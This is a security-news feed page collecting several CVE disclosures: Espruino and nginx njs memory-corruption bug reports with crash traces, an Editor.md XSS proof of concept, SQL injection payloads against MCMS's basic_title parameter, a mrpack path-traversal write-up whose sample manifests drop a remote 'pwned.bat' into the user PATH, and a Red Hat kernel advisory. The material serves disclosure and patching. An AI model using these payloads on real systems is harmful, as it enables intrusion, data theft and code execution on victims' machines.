Buffer Overflow vulnerability found in Espruino 2v05.41 allows an attacker to cause a denial of service via the function jsvGarbageCollectMarkUsed in file src/jsvar.c.

Hello,  
I found that IIlegal memory access may lead to arbitrary memory write inside jsvGarbageCollectMarkUsed . When Object property name is marked ，it will be regarfed as nativeStr struct. And read content pointed by property name and marked，which will result arbitrary memory write.  
Please confirm~~  
poc is here:  
espruino1.js.zip

test version:  
commit d543731 (HEAD -> master, origin/master, origin/HEAD) (20200505)

environment

gcc (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0  
run ./espruino poc  
(gdb) r  
Starting program: /home/zdz/Espruino/espruino /home/zdz/debugBug/espruino1.js  
\[Thread debugging using libthread\_db enabled\]  
Using host libthread\_db library "/lib/x86\_64-linux-gnu/libthread\_db.so.1".  
\[New Thread 0x7ffff6e85700 (LWP 4410)\]

| |\_ \_\_\_ \_\_\_ \_ ||\_\_\_ \_\_\_  
| | -| . | | | | | | . |  
||| || |||||\_|  
|| espruino.com  
2v05.41 (c) 2019 G.Williams

Espruino is Open Source. Our work is supported  
only by sales of official boards and donations:  
http://espruino.com/Donate

{ }

Thread 1 "espruino" received signal SIGSEGV, Segmentation fault.  
jsvIsString (  
v=<error reading variable: Cannot access memory at address 0x7fffff7feff0>) at src/jsvar.c:73  
73 bool jsvIsString(const JsVar \*v) { return v && (v->flags&JSV\_VARTYPEMASK)>=\_JSV\_STRING\_START && (v->flags&JSV\_VARTYPEMASK)<=\_JSV\_STRING\_END; } ///< String, or a NAME too  
(gdb) bt  
#0 jsvIsString (  
v=<error reading variable: Cannot access memory at address 0x7fffff7feff0>) at src/jsvar.c:73  
#1 0x0000555555565728 in jsvHasCharacterData (v=0x7ffff6644610)  
at src/jsvar.c:384  
#2 0x000055555556f8d2 in jsvGarbageCollectMarkUsed (var=0x7ffff6644610)  
at src/jsvar.c:3715  
#3 0x000055555556f97a in jsvGarbageCollectMarkUsed (var=0x7ffff6644650)  
at src/jsvar.c:3730  
#4 0x000055555556f9cb in jsvGarbageCollectMarkUsed (var=0x7ffff6644670)  
at src/jsvar.c:3738

Dongzhuo Zhao working with ADLab of Venustech

CVE-2020-23257: IIlegal memory access may lead to arbitrary memory write inside jsvGarbageCollectMarkUsed  · Issue #1820 · espruino/Espruino

Cross Site Scripting vulnerability found in Zentao allows a remote attacker to execute arbitrary code via the lang parameter

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-22533: XSS vulnerability in all versions of zentao · Issue #1 · liuyusjs/zentao

Buffer Overflow found in Nginx NJS allows a remote attacker to execute arbitrary code via the njs_object_property parameter of the njs/njs_vm.c function.

**env**

ubuntu 18.04  
njs 0feca92  
gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)  
built with ASAN on

**bug**

\> (1..\_\_proto\_\_.length \= '1', Array.prototype.slice.call(1, 0, 2)).toString()
ASAN:SIGSEGV
\===\=\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\=
\==13918\==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000407181 bp 0x7ffdf2511450 sp 0x7ffdf2511430 T0)
    #0 0x407180 in nxt\_lvlhsh\_find nxt/nxt\_lvlhsh.c:181
    #1 0x4479b7 in njs\_object\_property njs/njs\_object\_property.c:757
    #2 0x4210c2 in njs\_primitive\_value njs/njs\_vm.c:2987
    #3 0x4206ec in njs\_vmcode\_string\_argument njs/njs\_vm.c:2864
    #4 0x41473f in njs\_vmcode\_interpreter njs/njs\_vm.c:159
    #5 0x412c4e in njs\_vm\_start njs/njs.c:594
    #6 0x404a75 in njs\_process\_script njs/njs\_shell.c:771
    #7 0x40387b in njs\_interactive\_shell njs/njs\_shell.c:501
    #8 0x402ad1 in main njs/njs\_shell.c:271

njs scripts have no remote access, so the attacker can't control them and thus it's not a remote code execution.

emmmm, but i think this may cause at least cpde execution, if u can control the js it executed.Maybe LPE?

…

\---Original--- From: "Valentin V. Bartenev"<notifications@github.com> Date: Wed, Jul 3, 2019 15:53 PM To: "nginx/njs"<njs@noreply.github.com>; Cc: "Author"<author@noreply.github.com>;"lokihardt"<nine.twelve@foxmail.com>; Subject: Re: \[nginx/njs\] Logic problems happen in the nxt\_lvlhsh.c (#188) njs scripts have no remote access, so the attacker can't control them and thus it's not a remote code execution. — You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub, or mute the thread.

@l0kihardt

njs is used for nginx configuration and is not an application server. njs **only** executes js code from a static file which is a part of nginx config file (which **must** be trusted source anyway).

@l0kihardt If you can control njs script on a server, then you already have a root access and can control the whole server without any bugs needed.

 xeioex changed the title Logic problems happen in the nxt\_lvlhsh.c Array elements left uninitialized in Array.prototype.slice() for primitive this values.

Jul 3, 2019

Yeah sure, I use ubuntu 18.04, and did something like this \`\`\` export CC=clang export CFLAGS=-fsanitize=address ./configure make \`\`\`

…

\------------------ 原始邮件 ------------------ 发件人: "Dmitry Volyntsev"<notifications@github.com>; 发送时间: 2019年7月3日(星期三) 下午4:07 收件人: "nginx/njs"<njs@noreply.github.com>; 抄送: "3087136937"<nine.twelve@foxmail.com>;"Mention"<mention@noreply.github.com>; 主题: Re: \[nginx/njs\] Logic problems happen in the nxt\_lvlhsh.c (#188) @l0kihardt please, also share the way you run your POC. Cannot reproduce it (with ASAN enabled). $ cat github188.js var \_export = 1; \_export.\_\_proto\_\_.length= \_export.\_\_proto\_\_.sum = \[1\].slice Error(\_export.sum((\_export.\_\_proto\_\_.length= \[1\].toString(RegExp(Error()))) ===('loading exception'))) //export default \_export; \_export; console.log(\_export) $ ./build/njs github188.js 1 — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub, or mute the thread.

CVE-2020-19695: Array elements left uninitialized in Array.prototype.slice() for primitive this values. · Issue #188 · nginx/njs

An issue found in Espruino Espruino 6ea4c0a allows an attacker to execute arbitrrary code via oldFunc parameter of the jswrap_object.c:jswrap_function_replacewith endpoint.

**env**

Ubuntu 18.04  
Espruino 6ea4c0a

**bug**

This is a critical bug which will cause memory corruption at last, thus may cause potential remote code execution threat to the users.

It happens at jswrap_object.c:jswrap_function_replacewith:, so if we pass the parameter oldFunc with a null pointer, it may crash. If we provide the oldFunc with another address or another number, it may cause remote code execution.

void jswrap\_function\_replaceWith(JsVar \*oldFunc, JsVar \*newFunc) {
  if (!jsvIsFunction(newFunc)) {
    jsExceptionHere(JSET\_TYPEERROR, "First argument of replaceWith should be a function - ignoring");
    return;
  }
  // If old was native or vice versa...
  if (jsvIsNativeFunction(oldFunc) != jsvIsNativeFunction(newFunc)) {
    if (jsvIsNativeFunction(newFunc))
      oldFunc->flags |= JSV\_NATIVE;
    else
      oldFunc->flags &= ~JSV\_NATIVE;
  }
  // If old fn started with 'return' or vice versa...
  if (jsvIsFunctionReturn(oldFunc) != jsvIsFunctionReturn(newFunc)) {
    if (jsvIsFunctionReturn(newFunc))
      oldFunc->flags = (oldFunc->flags&~JSV\_VARTYPEMASK) |JSV\_FUNCTION\_RETURN;
    else
      oldFunc->flags = (oldFunc->flags&~JSV\_VARTYPEMASK) |JSV\_FUNCTION;
  }

**poc**

var a "should equal";
for (var i in a)
    a\[i\]\=i;

function test(a,b) {
    return 1;
}

E.mapInPlace.replaceWith.call(a, function(x) {
    return test(\[\].map.call("Hello", function(x) {
        return x + 1;
    }), "H1,e1,l1,l1,o1");
});

CVE-2020-19693: A memory corruption bug in the jswrap_object.c · Issue #1684 · espruino/Espruino

Buffer Overflow vulnerabilty found in Nginx NJS v.0feca92 allows a remote attacker to execute arbitrary code via the njs_module_read in the njs_module.c file.

**env**

ubuntu 18.04  
njs 0feca92  
gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)

**bug**

So, actually this is a logic bug, happened under an really interesting circumstance.  
the buggy function is the njs\_module\_read in the file njs\_module.c

if (fstat(fd, &sb) == -1) {
        goto fail;
    }

    text->length = nxt\_length(NJS\_MODULE\_START);

    if (S\_ISREG(sb.st\_mode) && sb.st\_size) {
        text->length += sb.st\_size;
    }

    text->length += nxt\_length(NJS\_MODULE\_END);

    text->start = nxt\_mp\_alloc(vm->mem\_pool, text->length);
    if (text->start == NULL) {
        goto fail;
    }

    p = nxt\_cpymem(text->start, NJS\_MODULE\_START, nxt\_length(NJS\_MODULE\_START));

    n = read(fd, p, sb.st\_size);

as you can see, it read the sb.st\_size and sb.st\_mode with function fstat. However if we dont provide a common .js file. the S\_ISREG(sb.st\_mode) will be 0. text->length wont be updated.  
and read(fd, p, sb.st\_size); still read sb.st\_size bytes into the p. p is on the heap. So we can overflow to the next chunk on the heap....

**poc**

CVE-2020-19692: Heap based buffer overflow in njs_module.c · Issue #187 · nginx/njs

Cross Site Scripting vulnerability found in Pandao Editor.md v.1.5.0 allows a remote attacker to execute arbitrary code via a crafted script to the editor parameter.

**Description:**  
User can use <script> src attribute to include external library(ex: angularjs), and then, execute malicious javascript codes.

    <script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.min.js> 
    </script>
    <div ng-app >
        {{constructor.constructor(&#34;window.location.replace(&#39;&#104;ttp://www.bing.com&#39;)&#34;)()}} 
    </div>
    

**Actual Results**  
The malicious codes are executed and page redirected to bing.com  
(The PoC is to display alert, but it can be changed to window.location.replace() for page redirection

CVE-2020-19698: XSS vulnerability found via <script> src attribute · Issue #700 · pandao/editor.md

SQL Injection vulnerability found in Ming-Soft MCMS v.4.7.2 allows a remote attacker to execute arbitrary code via basic_title parameter.

@RequestMapping(value = "/{searchId}/search")  
@responsebody  
public void search(HttpServletRequest request, @PathVariable int searchId, HttpServletResponse response) {  
SearchEntity \_search = new SearchEntity();  
\_search.setAppId(BasicUtil.getAppId());  
\_search.setSearchId(searchId);  
// 获取对应搜索模型  
SearchEntity search = (SearchEntity) searchBiz.getEntity(\_search);  
//判断当前搜索是否有模板文件  
if (ObjectUtil.isNull(search)) {  
this.outJson(response, false);  
}  
Map<String, Object> map = new HashMap<>();  
// 读取请求字段  
**Map<String, String\[\]> field = request.getParameterMap();**  
//TODO  
Map<String, String> basicField = getMapByProperties(net.mingsoft.mdiy.constant.Const.BASIC\_FIELD);  
// 文章字段集合  
Map<String, Object> articleFieldName = new HashMap<String, Object>();  
// 自定义字段集合  
Map<String, String> diyFieldName = new HashMap<String, String>();

Parameter: basic\_title (POST)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)  
Payload: basic\_title=q') AND 3749=(SELECT (CASE WHEN (3749=3749) THEN 3749 ELSE (SELECT 7782 UNION SELECT 6107) END))-- ZskZ

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: basic_title=q') AND EXTRACTVALUE(9263,CONCAT(0x5c,0x716b627871,(SELECT (ELT(9263=9263,1))),0x71786b7a71)) AND ('nLqp'='nLqp
    
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (comment)
    Payload: basic_title=q') OR SLEEP(5)#
    

Ask the author to fix this vulnerability.Thanks.

CVE-2020-20913: search has SQL injection vulnerability  · Issue #27 · ming-soft/MCMS

PolyMC Launcher <= 1.4.3 is vulnerable to Directory Traversal. A mrpack file can be maliciously crafted to create arbitrary files outside of the installation directory.

On Tuesday, 31st January, a member of the Quilt team discovered path traversal vulnerabilities in five different mrpack implementations, affecting MultiMC, PolyMC, Prism Launcher, ATLauncher and mrpack-install.

This article serves as a write-up for the vulnerabilities, and the affected versions.

**Affected software**

Below you can find a table detailing the affected and patched versions for each piece of software.

| Software | Affected versions | Patched versions | |----------------|-------------------|------------------| | MultiMC | <= 0.6.16 | >= 0.7.0 | | PolyMC | <= 1.4.3 | >= 5.0 | | Prism Launcher | <= 6.1 | >= 6.2 ¹ | | ATLauncher | <= 3.4.26.0 | >= 3.4.27.0 | | mrpack-install | <= 0.16.2 | >= 0.16.3 |

¹: version 6.2 of Prism Launcher contains a critical bug, we recommend installing 6.3.

We recommend every user to upgrade to a patched version. If you can't, we recommend you to inspect any mrpack before installation.

**Vulnerability details**

mrpack is a modpack format popularized by the Modrinth® mod sharing platform.

It allows modpack creators to define a files array to download various files, such as mods, during modpack installation. This can be open to path traversals by using an absolute path (if the implementation allows it) or relative directories (/../) to escape the installation folder and install a file in any directory the process has access to.

**Attack vector**

While we recognize installing a modpack requires trust into the modpack maker once the modpack is run, we're of the opinion that installing a modpack shouldn't require trust. One scenario can also be imagined where one would install a suspicious modpack for checking its content, leading to infection in the process.

Modrinth® confirmed they have checks in place preventing such a modpack from being installed, although this vulnerability still affects modpacks installed off-site.

**Demonstration**

Below you can find some example modrinth.index.json files that once put into a mrpack would install a pwned binary inside the user PATH. They assume the relevant tool is installed at the default location, except for mrpack-install which will depend on the execution location.

**MultiMC, PolyMC, Prism Launcher, mrpack-install**

    {
      "formatVersion": 1,
      "game": "minecraft",
      "versionId": "exploit-demo",
      "name": "Exploit demo",
      "files": [
        {
          "path": "..\\..\\..\\..\\..\\..\\..\\AppData\\Local\\Microsoft\\WindowsApps\\pwned.bat",
          "hashes": {
            "sha1": "f2f2afa63f7c46d966b460c6efa85505ec8e7d26",
            "sha512": "88b0dfed128d1b1dac86ef825fad577bd2fe99d79a8eb73a826a6634e6d2edadfe2fd50aa69b1009c38c7f4d1bbdd7199e2425cf3035515a794646474b3b28e8"
          },
          "env": {
            "client": "required",
            "server": "required"
          },
          "downloads": [
            "https://raw.githubusercontent.com/Akarys42/pwned/main/pwned.bat"
          ],
          "fileSize": 200
        }
      ],
      "dependencies": {
        "minecraft": "1.18.2"
      }
    }

**ATLauncher**

    {
      "formatVersion": 1,
      "game": "minecraft",
      "versionId": "exploit-demo",
      "name": "Exploit demo",
      "files": [
        {
          "path": "../../../../Local/Microsoft/WindowsApps/pwned.bat",
          "hashes": {
            "sha1": "f2f2afa63f7c46d966b460c6efa85505ec8e7d26",
            "sha512": "88b0dfed128d1b1dac86ef825fad577bd2fe99d79a8eb73a826a6634e6d2edadfe2fd50aa69b1009c38c7f4d1bbdd7199e2425cf3035515a794646474b3b28e8"
          },
          "env": {
            "client": "required",
            "server": "required"
          },
          "downloads": [
            "https://raw.githubusercontent.com/Akarys42/pwned/main/pwned.bat"
          ],
          "fileSize": 200
        }
      ],
      "dependencies": {
        "minecraft": "1.18.2"
      }
    }

**Advisories**

*   MultiMC: none
*   PolyMC: GHSA-3rfr-g9g9-7gx2
*   Prism Launcher: GHSA-wxgx-8v36-mj2m
*   ATLauncher: GHSA-7cff-8xv4-mvx6
*   mrpack-install: GHSA-r887-gfxh-m9rr

**CVE entries**

*   MultiMC: CVE-2023-25306
*   PolyMC: CVE-2023-25305
*   Prism Launcher: CVE-2023-25304
*   ATLauncher: CVE-2023-25303
*   mrpack-install: CVE-2023-25307

**Credits**

Vulnerability found and blog post written by Ambre Bertucci (Akarys)

Research inspired by Silver

CVE-2023-25305: Five vulnerabilities found in mrpack installer implementations

Red Hat Security Advisory 2023-1559-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include a use-after-free vulnerability.

Red Hat Security Advisory 2023-1559-01

Red Hat Security Advisory 2023-1556-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2023:1556-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1556  
Issue date:        2023-04-04  
CVE Names:         CVE-2023-0266 CVE-2023-0461  
====================================================================  
1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time EUS (v.8.4) - x86_64  
Red Hat Enterprise Linux Real Time for NFV EUS (v.8.4) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
(CVE-2023-0266)

* kernel: net/ulp: use-after-free in listening ULP sockets (CVE-2023-0461)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt RHEL-8.4: disable KASAN, KCSAN and UBSAN for kernel-rt  
(BZ#2165124)

* kernel-rt: update RT source tree to the RHEL-8.4.z16 source tree (async)  
(BZ#2183403)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2163379 - CVE-2023-0266 ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
2176192 - CVE-2023-0461 kernel: net/ulp: use-after-free in listening ULP sockets

6. Package List:

Red Hat Enterprise Linux Real Time for NFV EUS (v.8.4):

Source:  
kernel-rt-4.18.0-305.86.2.rt7.160.el8_4.src.rpm

x86_64:  
kernel-rt-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-core-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-core-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-kvm-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-devel-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-kvm-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-modules-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm

Red Hat Enterprise Linux Real Time EUS (v.8.4):

Source:  
kernel-rt-4.18.0-305.86.2.rt7.160.el8_4.src.rpm

x86_64:  
kernel-rt-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-core-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-core-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-devel-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-modules-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0266  
https://access.redhat.com/security/cve/CVE-2023-0461  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCvqnNzjgjWX9erEAQji3hAAiJOllK9VciQkxLUO2WiKQB4mig+cDp8n  
1Zm4g3/zeZMyYPoLFK5UjqlGNx2Ir+JowUkNqZz0jLibhu1WgArykSeUPnilRbA+  
Sq/EDfTF8inG+j39aynJPRIaalHGvW6wYpSuQU/moA9bPUdNvY8G5A0d/gJZAsuc  
SYbc5ylut7aZXaHeI7oDkdQw/udJJcmuD/+HORP8JLQeNvnb8UJmrMU0hgsoqhr6  
nl3FfYUdiR5vriZNIbxeNS9PD7K+MPsEkW51xPYkw7CzpXMfgG8otZLTwQBOuS9P  
bIJicxp3Zhg2W5ho5pO0DjKPlaHlBX88QYx5VNlxM/KN9unESDI1KhChEUva9+Ck  
97iU7CfAZgDWJ2PMPyW3cS9Og3Efep9kW05OLWo/K7rrQlEiZ/4n/DhLxHnUSGhK  
tTUkFb/4fXXeTQ+HTBEuWGq7SGDgMsHRmpQOEXVwrqkatTgwaQ5t2r6ka6+QQzra  
h2D8/VRuo0jgswN2ftM/4kHvLvh97/Rgy/W4yy3FENu6Bem8MvVaSG2QiGoKLZZH  
bNXFzHNoEX7FeYwagGm8s2R7vhzm6LO0XV0uh+2lY0iXU0/6moYRzK0PmN+fIGJS  
eU7Oh0VUxkKKb9AQO4EEraQcuEuw7HQpZSG13M17h977KJU6kBmDWZ0pzLX+VMYd  
V88Bo6k9bAs=ZtTu  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#js